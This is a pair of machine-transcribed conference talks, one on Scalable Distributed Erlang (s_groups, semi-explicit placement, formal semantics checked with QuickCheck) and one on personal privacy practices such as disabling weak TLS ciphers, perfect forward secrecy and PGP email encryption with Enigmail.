here, as you notice probably, the transformation de-factoring is a bit more complicated than it was from non-distributed to distributed Erlang. And for that, a team at Kent University works to simplify the life a little bit. Right. So now master, master process. So what we have here is that instead of in distributed Erlang, that would be a spawning of worker processes. Now master process, it spawns to the submasters. And then on the workers, workers spawn the processes directly to other worker nodes only if it's in the same as script. Otherwise, it would just spawn to the submaster, the master would spawn to another submaster, and then we do the routing. And then submasters now, they, the submaster processes, they share the responsibility of worker processes now because they need to decide, need to root where those worker processes should go. And they also take some responsibility of their master processes because they need to collect the credit and take care of those things. And then grouping. So we need to create a few groups. These are worker groups and we need to create a master group. And this is the result. So this one is, we measured on one, up to 160 Erlang VMs and this is, this was up to almost 1300 cores. And then what we see here. So if you notice, the difference is not that large, the first thing. But orbit, first of all, we need to think about the nature of orbit. So it doesn't use global operations. So what we reduce actually here is only connections. So the only thing that shows here is what effect on orbit, on a particular program that requires all to all connection, has this reduction of all to all connections. And another thing I'd like you to notice is this flip. That Scalable distributed Erlang actually, you know, changed the scalability to the better. So what are the things we work on? Another thing is a semi-exclusive placement. So when we have this structured set of nodes and or some mechanism how to call those nodes, it can be quite simple to remember those nodes. But what if we have a hundred thousands of nodes? Well, for a programmer then explicitly naming every node, it becomes a bit of a problem. So we need something semi-exclusive. And there are a number of reasons why we want to spawn a process and why we would want to spawn a process. So probably we want to put close together processes that communicate with each other quite a lot. So we want them to keep together. Or we have a very large computation and we want to put it somewhere far away. I'm sorry, somewhere far away and just that it would be, for example, executed on a cloud and just a bit reduced load on our own machines. And when we looked at it, well, we thought, well, actually, that looks very much like a tree structure. So we have something like racks in a server, right? And then we have a cluster. And then we have a cloud. And we can think of a method how we can spawn them close and far away, depending on those distances. And here we use something defined, developed in math. Well, the math, it looks a bit scary, but it's not actually. And I'll explain it. So what we actually look here is the distance, the common distance between nodes, those paths, those paths that share, nodes share between each other. So node B and C shares two paths. And it means the distance between them is one fourth. Whereas node B and G shares only one, it means the distance is a half. And then we have one. So it means that the larger this value, the further nodes are actually located from each other. And we can use this to actually define where we want to spawn our process. We did some measurement. And these measurements made, we used our Beowulf cluster located at Heretwood University in Edinburgh. So there are actually a few clusters over here. And what we found is, actually, yes, we can observe this tree structure when looking at the communication. Just a little bit to understand. So these are names of our Beowulf nodes. And these are the communication time. So we can look something like to, but I don't remember in which time it measured. Never mind. I'm sorry. I'll check that. So it just shows how long it takes for processes between two nodes to communicate with each other. So how can we use this semics list placement? Well, we can spawn nodes to using some sort of parameters. And for that, we introduce function choose nodes. And it uses a list. And this list is introduced on purpose because we want to extend the ways how we want to spawn those processes. So, for example, we can use an sgroup name. And for example, we have a node that belong to group one. And we have nodes that belong to node group. And node three can say, well, I want to spawn processes only to the nodes that belong to both two sgroups or to one just particular group. Another thing that we can do is we can use attributes. So each node, it can have attributes. What these attributes can be? Well, that can be software. This particular node has software hardware on which this particular node runs. Or some other, I don't know, modules, something about description of this node that we want to exploit. So we have sgroup, we have attributes, and then we have use distances. So for example, nearer than 0.4, 0.4, or between 0.5 and 0.7. So something like this notion of distance. This is a bit complicated, for example, to put in a programmer to know all these distances. So what we want to introduce later is to make it more automatic. So introduce something like nearest, furthest, a bit further, very close, something like that. So more intuitive rather than forcing people to remember actually those numbers and exploit the system. And this actually, well, the semic-explicit placement is also good for portability. Why we want it? Because, well, I suppose I don't need to explain that we develop very often programs in one hardware, on one hardware architecture, and then port it to another hardware architecture. So this portability is really important. And this nearest, closest probably will be a solution, or at least a help to resolve those problems. Another thing that we work is the semantics. So why do we need semantics? We want to reason about that. We want to explain, we want to understand what our system does. We want to know what sort of properties it has. And for that, we need some formal semantics. And we introduce semantics only for SDE alone. And these are 16 functions. So something like 9, I think, 9 of these functions, they actually change the state. And other functions, they don't change the state. They return on the value. And so what do I mean by that? So for example, if we want to reduce, to create a newest group, it means that we change the state, actually. But we want, when we just want information about a nearest group, we return a value, but the state, nothing happens, we just collect it information. And this is how our semantics looks like. So we have set of groups, set of free groups, free hidden groups, and set of nodes. And this defines the state. And groups, all of them, they're associated with a set of nodes. So for hidden node, there's just one node. And for groups and free groups, there's a set of nodes. And all of these groups, they have a namespace. But as groups, they also have a name. And here, the first property, and it's quite obvious, but it's nice to see it from the semantics, that a node can belong to only one of those groups. So it can be free hidden, free normal, or belong to a nearest group. And this is how our semantics looks like. So it means that we have initial state, we apply a command on node n i, and then the state changes and it returns a volume. And this is a small example. This is the simplest one. So we have s group and we register a name. So we register a name in s group, it has name, it has speed, and it's just yes or no. So yes, registered, no, no, sorry. And we have initial state groups, free groups, free hidden groups, and nodes. We register a name in s group, name, speed, or node n i. And then we check if actually this node n i belong to this s group. And then we check if this actually node or speed are already registered. And if all these conditions satisfy, then we just register the name. And we modify the state and return true. Otherwise, return false. Well, all this is very nice and mathematics is nice. But how do we know that we actually can trust this? Well, for this, we use a quick check. And what it does is we have our s group command and then we go into two directions around it. So the first directions is we actually execute this command in the real system. So we take the command and we get a new state. And we also go through a different direction. This we take operational semantics, calculate it using our mathematics, and then get a new abstract state. And for that, here we need precondition. So precondition for this particular command is that set of nodes in the s group, it can't be empty. So s group can't be empty. And we have a post condition. And post condition is that actually abstract states, they should be the same. They should be identical. And that was really, really useful thing to do and to have. Because first of all, while writing maths, we identified quite a number of errors and misunderstandings and miscoding in the implementation. And then while running this quick check, we saw some problems with maths and again with implementation. So it was really helpful, really useful and we'll hope to move forward with that. So future work, first of all, we have quite a lot of plans with semi-explicit placement. That is, as I said already, we want to change how we think and how we apply those distances. So instead of numbers, giving actually some meaningful names to programmers. Another thing is we, oh right. So another thing is we want to look at robustness. So what happens if node fails, how the system knows about it? And of course, automation. Because just now, all this information is collected just, you know, it's hard to code it, it's just in configuration. And what we want, we want the system to provide us this information. And of course, running testing the system. So first of all, look at how run Simdiaska, our benchmark, this is an engine, run it and see how it works. And it's quite a large one. It's EDF and it's on the blue gene and it's something like 65,000 of course. Also, we want this SD Erlang to become standard. We want to improve it. We want to work on it and we want it to be included in the OTP. Of course, continue to work on SD Erlang. We found it's really useful, really just how we think, how we understand the system and the methodology. So how we actually go from distributed or non-distributed application to SD Erlang application, how we refactor it and what we need to do then. So these are some links. If you find them interesting, a bit about the release project, the OTP, the modification, I'm sorry, to the OTP. These are benchmarks that we use all here. Perceptu is a tool we work on in the release project. Then Bench. This benchmark is more if you're interested in scalability of VM because in the release project we also work on the VM level and it's already in the releases. So if you want to see how differently releases change scalability, that will be quite interesting tool to play with. And Simdiaska, if you're interested in the simulation engine that we are going to use, the information is there. And thank you. So feedback, questions, very welcome. Thanks. Any questions? Right, yeah. You mean SD Erlang, right? Yeah. Well, in the early game of the slide deck, you had some parent-bed of nodes that were obviously preferences of things. And what are they in this list? I know. I think this is just links. But if you let me know what sort of information you're interested in, I'll be happy to give links and put them into slides and just read whatever. Right. Well, great. Thank you. Thank you for coming and thank you for listening. Thank you. Thank you. Thank you. Thank you.
|
In this talk I'll present Scalable Distributed (SD) Erlang -- an extension of distributed Erlang functional programming language for reliable scalability. The work is a part of the RELEASE project that aims to improve the scalability of Erlang programming language. I'll start by providing an overview of the RELEASE project and discussing distributed Erlang limitations. Then I'll introduce SD Erlang, its design, motivation, and the main two components, i.e. scalable groups and semi-explicit placement. The scalable groups (s_groups) enable scaling the network of Erlang nodes by eliminating transitive connections, i.e. a node may belong to multiple s_groups where each s_group node has transitive connections with the nodes from the same s_groups and non-transitive connections with other nodes. The semi-explicit placement enables to spawn processes on nodes either in a particular s_group, or with particular attributes (e.g. available hardware or software), or with certain parameters (e.g. least load). I’ll also cover the results of the preliminary validation, and SD Erlang operational semantics and its verification. I'll conclude the talk by providing a brief overview of the ongoing work and our future plans.
|
10.5446/50851 (DOI)
|
Okay. I think we can start. Hello, everybody. Welcome. This talk is an experiment for me. I'm now 50 years old and I have a strong background in computer science with some main focus on service-oriented architecture in C++. And last year, I was really fed up because I learned that besides that I know that when I send emails that there's some danger that people read it, that in practice, the reality is a lot worse. Or to say it with other words by Tim Pridlov, one guy at the Chaos Computer Club conference in Germany last year, we woke up out of a nightmare to find the reality was even worse. And we had assumed a couple of things before, but we didn't know how much privacy is an issue or non-privacy is an issue in this world. So I'm fed up, but I don't want to give up because you can, of course, argue, well, secret services and other people who care for breaking privacy for maybe some good reasons, they can do everything. So you have no chance to win this fight. So I want to contribute and help that at least this fight becomes more complicated. I'm still learning. It's a new topic for me to some extent. And this talk has the idea of both. I'm telling you what I understood so far, what I learned, and how I contribute and maybe if you are willing to help to make this world a little bit better from my point of view to contribute. So let's start. I don't want to discuss the whole issue from whether it makes sense or not, but just let me state one thing. There was in 1948 the Universal Declaration of Human Rights by Roosevelt and others signed. And one of the articles, Explicit Privacy is an issue. And now we have challenges for that. As I said, there might be for good reasons, but at least in Germany, as we learned that the Chancellor's mobile phone was, well, was, was investigated by the National NSA by the U.S. That was probably approved that they don't assume that our Chancellor is a terrorist. So there are other things behind. And for these other things, I think that's important for a couple of reasons, not just for my privacy, but also for privacy in companies and also to protect other people. So there's one reason you might, even if you don't have something to hide, you might care about privacy, which is we have to make privacy a general usage because otherwise those people who encrypt immediately people who are in focus. So we have to protect those who need privacy. So that might be also a reason to help in this area. Okay. So if you are interested, read this article by Martin Fowler, which you might have heard about why this is an issue. So so far so for the motivation. So let's jump into details. Before I go into what I learned just for me, I can do, and it's a very practical thing. It's not bringing the whole issue on table and discuss every detail and everything we could do. Let me at least introduce some theory about encryption, which is needed here. We have in principle three ways of encryption, which is symmetric encryption. So we agree on a password. And so we both have to know the password or we use that when we store data on a file, I use a password and then I read it again. I use the same password. So there are encryption algorithms for that. And then we have the asymmetric encryption, which is pretty important as you will see later on for email and other stuff, where encryption uses a different password than decryption. This is safer but less convenient. And then we have hashing, which is for signing data so that protecting the integrity of data, so make it ensuring that this data was not modified. So with this short introduction of theory, let me show you one important thing and that is if you sign or if you encrypt, that doesn't mean your data is protected because it all depends on how good encryption algorithms are. It depends on how good hash functions are. And you see here on this list from some guys, but it's a common agreement in principle which encryption and hashing functions are broken. Broken means, for example, that we know that secret services can read them alive while they are in transit. So for example, RC4 is broken. If you use SSL in a browser, RCFIR is one of the valid protocols. So if you have the impression the communication with a server is safe, it might simply not be the case. We come to that later. And similar for hash functions and other algorithms. So be careful. We have to use better encryption. We especially learned that secret services like the NSA try to rule new encryption algorithms so that they have a backdoor inside. And in fact, what happens right now, the encryption, the cryptographic experts in the world are now trying to find new algorithms with the explicit request that this algorithm is not allowed to come from the NSA. So that we are sure that we hope we can be sure that there is no backdoor inside with the algorithm itself. That's to give you some numbers. NSA has 1000 experts only caring for decryption of encrypted data, only mathematical decisions, et cetera. The whole manpower of trying to investigate in privacy and breaking privacy is the amount of population of all people in Norway. It's the same number of people involved. So we have, we have something, well, some people who have at least a lot of resources and manpower. The good news is mathematics is our friend. So if there's no backdoor, encryption helps us. But we need large enough keys and we need valid algorithms. So therefore, for example, we currently recommend to use at least keys with 4096 bits, for example, and not less. And mathematics is our friend. The more bits we have, as it is a logarithmic curve, the more re, the, the, the, the, the, the, a lot more power is needed to decrypt something. So the more bits we have, the more mathematics is our friend. So that's theory and that's just also a practical information about theory. So now let's start. The first thing I can do is, well, well, I should say is privacy is not only about, about secret services. Privacy is about data I want to hide, data I, I want to avoid that other people have and use it or even other companies. And as you know, one company or a couple of companies are now collecting data, which is fine. My daughter is happy to use Facebook, et cetera. So I, I even use Google. However, I'm not so happy that Google is able to see which topics I'm searching for. So one first thing I can remand you is, recommend you, if you want to Google without letting Google to find out who Googled what, you start page. Start page dot com. It's a website. They have a contract with Google. It's not an illegal or in official search. It's just a wrapper you can use. And if you search here for just some term, this search is redirected to Google but without your IP address. So which also has some drawbacks. I mean, you don't get personal answers that are, that are ideal for your personal benefits. Yeah, because they don't know that you are searching. So it's always some good and bad things and you have yourself to decide. But in any other sense, it's as good as fast. I use it now a lot. And this is by the way one example where privacy, more privacy doesn't cost us any convenience or any inconvenience. So that's, that's good. That's the first, that's the easy recommendation. So let's talk about browsing in general. As I said already, in principle, it's possible in browsers to enable encrypted communication, encrypted communication means not that nobody can track who is communicating with which browser, but it's at least hidden what we exchange as data. To use approaches where even it's not possible to see who is communication with which side, you need other approaches like Tor, etc., which I don't handle here in this talk. For me, it's good enough right now to think a little bit about when I have a connection with my bank. I want to ensure that this data can't be read by any other company or any other agency. So as I said before, of course, you should use SSL, which means HTTPS. But the problem is some of the algorithms are broken. So how can we deal with that? Well, you have to configure your browser. And as usual, it's always very easy to configure browsers in the world of Mozilla, so Thunderbird and Mozilla Firefox. And it's probably more an effort in other browsers. So I give you some examples how to configure Mozilla here better. And before I do that, this is a website where you can find out which encryption protocols your browser accept and would accept and in which order with which priority. So we don't have to understand here everything about that. I will talk a little bit about some of the issues here. But you see these are close to 30 different protocols we use to exchange data in an SSL communication. So some of them are broken, some are not. So if you look here around, maybe you see something like RC4 somewhere just at the bottom, RC4. I told you RC4 is broken. So the good news here is it's on the bottom here. So it's the least thing we try out. There's also other RC4 in the middle. Yeah, probably there are a couple of them. So this is something with every browser you use, if you go to this website, that will tell you what you prefer and in which preference. So and then let's do something about that. So let me tell you one story and one additional fact which is private, a perfect forward secrecy, a PFS. PFS is very, very, very important for you because there's one important thing. Beside the quality of the algorithm you use, there might be another problem and the other problem is that all connections to a server use the same keys, the same keys to encrypt the data. So guess somebody has broken that key, just due to one communication, then all the communication is open and if they video data all the past communication on their servers, they can even read all the communication from the past, just when they got the key. This is by the way what happened with Lava Bit. You might have heard about this case where they closed an email website and they used one central key for all communication and it might not even, it might not be the case that just you say, well, somebody stole the key or got the key from somewhere or so ever. It's also an issue, well, there are roots in these worlds and there are good reasons that by law people are forced to give out keys. So if there is a terrorist, I'm still interested that we track this data. But this should not mean that they track all the data with all communication in future and pass off all people connecting to that site. And to avoid that, you need PFS because PFS creates an individual key with every communication between each server and each client. So once, for example, by law, you are forced to hand out the key for a certain person who connects to a certain server. With PFS, this does not mean that any other communication is public or open to the public. If you don't use PFS, handing out the key or losing the key to somebody else means everything is open in the communication with this server. So PFS is something you should really care and look for. So what can I do? I said that. So in concrete, I can, for example, in my different browsers set up and disable some of the protocols. The easier thing to do that is in Mozilla Firefox. It's also possible in Explorer with a little bit more tricky stuff and other browsers probably also. Here you see how I can do it with a browser. I select just all the SSL3. Look at the left. I select all the SSL3 exchange options. And then I disable all those where RC4 is mentioned. So by this, I disable encrypted communication or SSL or HTTPS connections using RC4. What else have I done here? Here is on the top right, there's a security TLS version minimum. This is a minimum exchange protocol we use. The default is zero and there are more better values. So the best value is three. But unfortunately, if you disable some of these values and the servers don't offer better algorithms, you are not able to connect any longer to your server. So that means by raising this value, it's more likely yet that you can't do any more bank account online handing or whatsoever. So that you have to find out. And by the way, what I do is I use as a default server, I use Firefox Mozilla. And then if I can't connect you to my settings, I use Internet Explorer. But then I know that this is an unsecure communication also although HTTPS is signal there. So here are the recommendations I can give so far. So disable all the settings with RC4. Use so-called TLS 1.2. But this is the minimum version three. So if that doesn't work, use as a minimum TLS version two or one, et cetera. By the way, in Germany, in Germany at least, we now have by government officially recommended to support some of the better protocols. For example, if you connect to servers by the government, you are forced that these servers support TLS 1.2. This is probably not the case in every country and not in the business world. But that's something, for example, you should ask your bank or if you are programming in a bank, change your servers. Often it's just an option in your Apache web server just to do that. It might. One reason not to term the better encryption of might be resources because the better the encryption algorithm is, the more resources you need on the servers. So there might be a price when you're running servers with better encryption. Okay. And for, and PFS, which I said is handle out individual keys for each connection, you should enable only those SSL 3 protocols using DHE or ECDHE. So which, which when I do that, I have really a couple of problems to connect to other websites. So it's still limited supported, but we hope in one or two years if we have enough pressure and if you send just enough emails complaining, I can't connect any more to your so-called secure server that you tell about that this will change. So here with my settings, I, I reduced only to, to accept PFS servers and then I still have a couple of different options to choose from. But as I said, a server has to offer this protocol. If not, I get something like this. This is unfortunately a German message, but you can see in the middle, the error code, the Fela code is SSL error, no cyber, cyber overlap. So we have no overlapping protocol, which we both agree on to support. And if you want to understand more details about this and inspect websites better, I recommend Calamel, Calamel is an add-on for Mozilla SSL validation. They create on the upper left, they create a colored icon and this icon signals how secure an SSL connection is you are using. If it's red, then it's really worse or bad. If it's blue, it's okay, green is perfect. And so what I opened there is you can then click on it and then see the details. So without clicking on it, you don't see this big picture with all the details, you just see your ordinary website and adjust the icon there on the left. And as you can see here, for example, on the left side, this is a, this is a start page with this new upcoming email server with encryption support by those who also run, oh, no, no, this is a start page I just mentioned, sorry. And you see that when I sent my request to them, we, for example, support PFS, which gives us 20 of 20 points for the rating of this color of this icon. So they change from time to time what is necessary to be green to get 100 percent. As you see, this website is rated as 88 percent. Half a year ago, it was 100 percent, I guess. So you always have to fix according to new findings, new standards and whatever we found out as, maybe even we found out as being broken. So here on the right side, that's one bank in Germany. Is it still working? Yeah, okay. That's one bank in Germany. That's a Volkswagen bank, German car. They also have a bank. Any car vendor now has a bank. And as you see, they are not that perfect with support. So they have 34 percent. And you see they have no PFS, for example, they're in the middle PFS, no zero of 20 points, which means if somebody by law gets a key to validate the connection between any customer of this bank with this bank, with this key, they can inspect all my data I exchanged with this bank in future and in the past if they just streamed my communication in the past, but they couldn't read it. So therefore, maybe we should change the bank. But it's not so easy to find banks, which do it all right. But we need pressure for that. Okay, so far for browsing. Now let's look to emails. With emails, we have a similar problem which is in principle we can encrypt data, but we can't easily encrypt meta data, which is who am I sending data or emails to. If you need that, then it's even more complicated. There are in practice, there's no protocol working and established where we can add or not, just use a private communication where nobody can track that we communicated. So if that's your problem, I don't have an answer, I don't have a standard answer for that. But if not, if it's only that, yes, they can know that I have a discussion with my text lawyer or that I have exchanging emails with my doctor for medical reasons, yeah, they can do that, but they shouldn't know that I talk about abortion here without me allowing that. So that's something we can solve. And to solve that, there's a very famous approach which is PGP, there are other approaches. And before I go into details and list some of the issues involved there, let me please allow to explain PGP and in principle asynchronous encryption by an example because that's usually the easiest way even my mother understands these slides. Well, she at least claims to. Okay, so what is the trick? The trick is that's Nico on the right and I want to make email exchange secure. The first thing I have to learn is it's one thing we have to do on both sides. So one thing I can arrange is that people can send me emails without anybody else reading these emails. But I can't do anything with this protocol to sending encrypted emails to other people, they have to prepare for that. So I have to prepare keys and these keys are asymmetric keys and there are two keys in fact or in practice they're even more. Let's for the simplicity, assume that are only two keys. And these two keys are used. One is to encrypt data and one is to decrypt data and you can only decrypt data encrypted with this key and the other way around. So the point is now I created these two keys and the fundamental first rule is nobody gets my decryption key which is also called my private key. So with this I can read the data. With the other key I can only encrypt the data which means with this key I can organize that only NICU can read this data if I have the private key or only the owner of the private key can encrypt this data. And there's nothing wrong with giving this key to other people or to the public or putting on the website or whatsoever because nobody can violate privacy with this key. They can only encrypt data which nobody can read except me but I to make sure that only I can read it I need the private key at home or in my laptop or whatsoever we come to that. Okay, so that's something I have to prepare. With this preparation I am able to receive encrypted emails. So now somebody wants to send me an email. Okay, here's a yellow guy, an orange guy. The orange guy wants to send me hello NICO as a test man. Okay, so what do they have to do? They encrypt the data with the mailer. To encrypt this data they use the public key. However, this guy got this key. I might have given it on a USB stick. I might have put it on my website. I might put it on a central server where public keys are available. I might have written in the letter with 4,096 bytes and they have to copy them. That's all possible. It's still possible to copy 4,096 bytes. It's a little bit boring but it is. So this is the result and you see there, well, a little bit as a smaller icon. There's hello NICO encrypted by this key. And then you send the key to me. And so what I do then, then I use the private key to decrypt the data and suddenly I see hello NICO again. So that's the deal. So if I want to send an answer, if I want to send an answer to this guy, he first has to do the same to create a private and public key pair. Somehow I have to know about his public key and then I can encrypt the answer with his public key, send back, encrypt the data, the email and then he can decrypt the data. The good thing with this is we don't have to exchange any passwords with other people can catch because I don't send anything to the public or via any communication channel which is not public. So, because I have the key but the door backs of course is we both have to be prepared to exchange data this way. Or in the other hand, I can even receive emails from people not being able to read encrypted keys by using this technology just when I prepare everything. So that's the principle. There are at least, well as I said, first of all, one important thing here is that people not just using a huge amount of computer power can just try out all the possible keys. So two to the power of what is the size of my key combinations to decrypt the data. So about two to the power of 4096 is a very huge number. And so we are pretty sure that it will be stable for the next 20 or years or more. We thought in the past that 256 bytes for a key would be fine but we now know that this is broken. But the recommendation for people who say you want to be safe in your infrastructure for the next couple of years, so not just two or three but ten also is 4096 bytes is fine. So that's the first thing. The other thing is there are still some problems. So one thing is we use random number generators and one common trick by Secret Services is to violate random number generators so that you only create all the thousand random numbers instead of the whole variety of two to the power of 32 or 64. So then you screw up not the algorithm that the way the algorithm is used combined with random numbers and that might also lead to some problems. So it's not only that but this is the most important step. This is the basics to be safe. Okay. But the other thing that might happen is that the following happens. It's a so-called man-in-the-middle approach where we have the following. Guess the orange guy want to send me an email and he doesn't know my public key. So he needs it from somewhere. So I can give it to him personally. The other thing is he looks at my website or he looks at a public server but there's a fake key, fake by whoever knows. So in the communication by retrieving the public key somebody gives him a different key. And with this different key they encrypt the data but they use the wrong key. So somebody in the middle might then have the key that was used for encryption and then use my public key to send the data in a way that I read it so that I have the impression I got this message from the original sender so that I don't say it's getting lost or I can't read it. I can still read it but there was a change in encryption in the middle. So this is man-in-the-middle attacks and to prevent from that we have too well. We can do a couple of things. The safest approach is I hand over my public key to each person personally. I go to you and I give it to you and you know that's Nico and we are fine. The other thing is each key even if it has 4,096 bytes has a so-called footprint which is just a hash way or that which is a unique value of the last I don't know 32 bytes or so. So I send this key around and then by phone we communicate we know our voice so that not my voice is fake somehow. And then we agree that the footprint is right so the last 32 bits are met so then we know it's fine. And then we can use other approaches. One approach is I trust places where I can officially publish keys. So this is by the way the S-MIME approach which is another encryption technology better supported by the Bay-Boy by most of the mailers. The problem is that these servers, the S-MIME servers are controlled well are located in the United States. So hmm well just theoretically just in case the NSA wants to get access to these servers they can do and as with the Patrick act of the states it's even not allowed by those who are running these servers to tell me that there might be some secret service looking at these keys and faking keys. So we have some examples and we are pretty sure in the community that the S-MIME approach is broken for privacy so it might still, you can still use it if you compare the keys yourself. That's fine and the whole technique is there. But if you just want to use keys from public servers then S-MIME is the risk. A known risk now. So the other approach is PGP approach and the PGP guys thought different about that. They said it's always a risk if I create some protocol where there is central control because then there's a central ability to corrupt this control. And the idea here is in principle that they built a so called web of trust. And that means there's no central server. Well there are central servers but these central servers only hold the keys but there's a protocol inside the keys that is used in a way that people have to confirm that this key is valid. So I can download from the server the key and inside the key there might be a statement that my girlfriend signed this key or that a company I trust signed this key. Of course it's all, it's again difficult if I trust the wrong people but the principle is either I signed the key or somebody I trust signed the key. By the way enough people I trust signed the key. And if you sign a key there with this protocol you can say I am absolutely sure that this is the key for this person. So using your ID, personal ID or you know that person and we agree this is my key. Or you can say well yeah I think it is this person but I'm not absolutely sure. So and then there are some rules inside which say for example if either I trust or if there are three other people that confirm that they are sure that this people is, this is the right person, this is the right key for this person then we accept this key as valid. So this is a general idea. The general idea is that we build a web of trust where if I can't myself find out whether I can trust this key I can find out with the help of other people's I trust indirectly. You can configure how much indirections are allowed. You can configure how much, how much proofs by trusted people you need but the defaults are usually fine. So it depends how much it is likely that other people screw up trustness by keys, etc. So that's inbuilt in PGP and that gives PGP a lot more power because it can't be screwed up by, in a central server by just one person or one company. So having said that, let me say something about keys. Well first of all you can in a key represent more than one email address. Also a key belongs to a revocation certificate. So with your key you get some way to revoke this key which you should also always create when you create a key. So that keys can have the following state valid, invalid, expired, revoked, disabled. So another thing a key has is an expiry date and you can also personally disable a key in your own environment. A key also has a passphrase and you can change this passphrase, you can change expiry dates and add an additional email address. So the usual thing you should do is if you create a key, create it please with 4096 bits RSA algorithm. Please create a passphrase, please create an expiry date, something like three or five years. So that if you just forgot the whole issue because privacy is no longer an issue, it's just a hype now and in five years or in ten, in two years we all forgot that until we have the next problem. So then this key is not valid for centuries. So and you should please be aware that you can, although a key can be used by multiple email addresses, the life cycle of these email addresses should be the same. So it's not a good idea to have one key for your job email address and your private email address because when you change jobs this key might be invalid but you still need it for private reasons. So therefore please make sure that you have different keys for different life cycles. You can still change the email address in your private life or in your business life but you should separate these keys for these areas. And as I said before, never give up control of the private key. It's no problem to give up control of the public keys and you can also give up control of the revocation keys. There's no secure penalty there because the worst thing that can happen that somebody revokes the key but still with the private key you can read the email so it's just an inconvenience. So the only thing you really have to care about is the private key. That's the important thing. Don't give it to anybody or anywhere. Well, that's what we come to that. Some other commands. PGP has two flavors, inline PGP. That's an ad hoc PGP standard or it's a non-standard. It's just, it works. And we have a PGP MIME standard for emails and the problem with the MIME standard is not supported as well as inline PGP as inline PGP is ad hoc. You might have especially problems if you have attachments and emails, et cetera. Then, unfortunately, we still have interoperability issues. This technique is 25 years old. But still we have limited support for PGP MIME and inline PGP serves pretty well but has some limits. So we have very well support with Thunderbird called an Enigmail add-on. I'm currently a contributor to this add-on to make it more convenient. We come to that. And Apple has, for Apple there's GPG tools. Both is not supported by the vendors. It's third party projects for add-ons by private companies or private people. So private just interest people. We have restricted support for outlook, platforms and web mailers like Yahoo, et cetera. There is some solution. Here are some hints about where you can look at. The real problem is vendors don't care about PGP. I don't know a buy. Maybe it's not worth it. It's not worth the effort. Maybe there is some secret governance by, for American companies because all these companies are American not to support this standard. We don't know. We simply don't know. So and then the quality of the support can be very different. Ideally in this world it should be the following as we will probably, as PGP is not common or mature, you will exchange data with people who don't have PGP support. But you might want to exchange data who have PGP support. The obvious, easiest solution is the following. If I have a key for all my recipients automatically encrypted and send it encrypted. So that's the best support where you don't have to do anything with when sending emails. This is not implemented in all the browsers. So sometimes you have to explicitly enable encryption. You can then somebody sometimes add rules when for this guy it should be encrypted for this guy not etc. So there's different convenience and different inconvenience there. In the worst case if there's almost none support, you have to copy and paste the content of your email to an encryption program and copy it based after encryption back or to read it you decrypted this with another tool and then you copy paste it better or after that you can read it. That's always possible, but that's very inconvenient of course. Please help. So last minutes I want to show you some examples. I have 50 more minutes. I am contributor of Enigmail. So I want to show you some examples how this works. So I hope I don't give you too much privacy of my email communications. This is not a special account, but I disabled hopefully enough. So this is Thunderbird and here you see, well, I'm switching to an email and in this email. Yeah, as I haven't, haven't put in my passphrase and it's the first time I read this email today or how long this passphrase is valid. I have to put my passphrase. Oh. So now there it is. So the formally unreadable content now becomes readable. You see here there's a green sign saying that this is a decrypted message and that this is a signed message so that the sender also authorized him. I didn't have a demo for that how it works, but besides sending the email encrypted, if I want to make sure that it comes from the right person, I can also sign it with my keys. So, and I can read it and handle it. I can reply to it, et cetera. To do that, I, well, I have to install the tool, the add-on. I have then to start a wizard which also asked me to create a key pair if I don't have it and I have to provide some preferences. Here you can see the major preferences we have. Well, we have two major preference tabs. The first one is they tell me where they found the underlying encryption software which is a program called GPG PGP. And so I can use that. I can install it separately or you can install it with the Enigmail add-on. And then here you see that I say my passphrase is idle for 40 minutes. So after 30 minutes, I'm asked again for passwords when I want to read the emails again. And then I have some sending options. This is, by the way, not the current version you can download as the official add-on. This is a nightly build. It will become in four or six weeks the official version. So one thing I added was this automatic encryption. Automatic encryption if I send emails which is not there before. So I tried to add some more convenience here. So we will see in a moment. So here is when sending emails, use convenient encryption settings. And as you can see here, the convenient encryption settings automatically reply encrypted if you got a reply to an encrypted message. They automatically sign. If you want to reply to a signed message, they accept all keys. So we don't use the trust model I just introduced yet. We say, oh, it's good enough. It's still better than sending postcards. So, but of course if you, if this man in the middle danger is a real danger for you, you should not select this option and then automatically send encrypted if possible and don't confirm before sending. Well, I will confirm. So I use my manual settings. There are a couple of more options as you can see if I add on the export settings, but these are the main settings. Okay. So now let's answer this email. So I have two screens here. I have to, so this opens my reply message. So here on the bottom right, there you see two symbols. These two symbols say the message will not be signed and the message will not be encrypted. So, hmm, but I have auto encryption. So let's select somebody I have a key from. So which is my, my colleague, Utah Eckstein. So you see even now, why this new, this person is selected in this menu on the bottom right, you see a plus sign there in the key which might, which means in principle, my general preference was not to encrypt, but with the plus sign, it will be encrypted. So, so let's do that. I can also go here and enforce encryption or force signing and I have, for example, the ability to change some defaults. For example, here are my defaults for this account in Thunderbirds. So in general, sign all messages or encrypt all messages, finally sign automatic messages when they are encrypted or when they are not encrypted, etc. So here I could now send, for example, by explicitly clicking no, I don't, yes, I also want to sign it, but no, in this case, although I have the key, I don't want to encrypt it. So just hitting this button does that. I do it back here. So, so I have now here forced sign and encryption just because I have the key. Yeah, so that's it. Hello. She's currently in Budapest, I think. So hello to Budapest at another conference. So that's it. Oh, this, this is privacy video taped. Too bad. Okay. We signed it about the date when I sent this. Okay. So, I send it while here's later, send on later. So I'm now request for sending the email for my passphrase. And that's it. Here you see a final confirmation, which is us and here you see the encrypted message which will go out over the internet. And, yeah, nobody can read this message unless they have this private key. So, yeah, because I'm not online right now, they are sent later and though I have the option to save this message now and there's also a final information which keys are used. Yes, the subject is not encrypted. The subject is, it's, it's only the content of the email. So what we still know is who is the sender, who is the receiver, what was the subject. Yeah. So the meter, meter data of email is still known. That's what I said. So what else I want to say or show you? Yes. In this case you said, Nico, because now you didn't have the key for encryption to watch Nico. Is that correct? No. Or just, you know, you have two receivers. Ah, yeah. Oh, yeah. I have only one receiver here which counts. I have another receiver which is BCC. BCC has the idea of that other recipients don't see that there's another guy reading on getting this email. Now, if I would encrypt for this guy, the information that this was encrypted for this guy will be part of the message. So therefore, BCC is a special case. BCC doesn't count and there will be warnings if I BCC not to myself. It's just, it doesn't count here because I send it to myself. But if I send BCC to others, there will be a warning. Do you know that this means that people can see that or that you can violate BCC? Because what happens here, what you see here is the following. This is encrypted. Part of this encryption is the information which key was used by whom. You can disable that but, yeah, usually don't do that. So the better, the better approach is don't use BCC. Just BCC as a separate mail to others. And as I said, a mailer should warn about this danger. And by the way, and you can send to multiple people just because this question also arrives again and again. So does it mean that, that with every additional receiver, the message size grows by the same amount? No, it doesn't. Because the trick is internally the email uses an temporary password, a temporary key. And only to read this key, that's encrypted for all the receivers. And so that the step is for each receiver has the ability, a special key to encrypt the key to read the data. So therefore, it 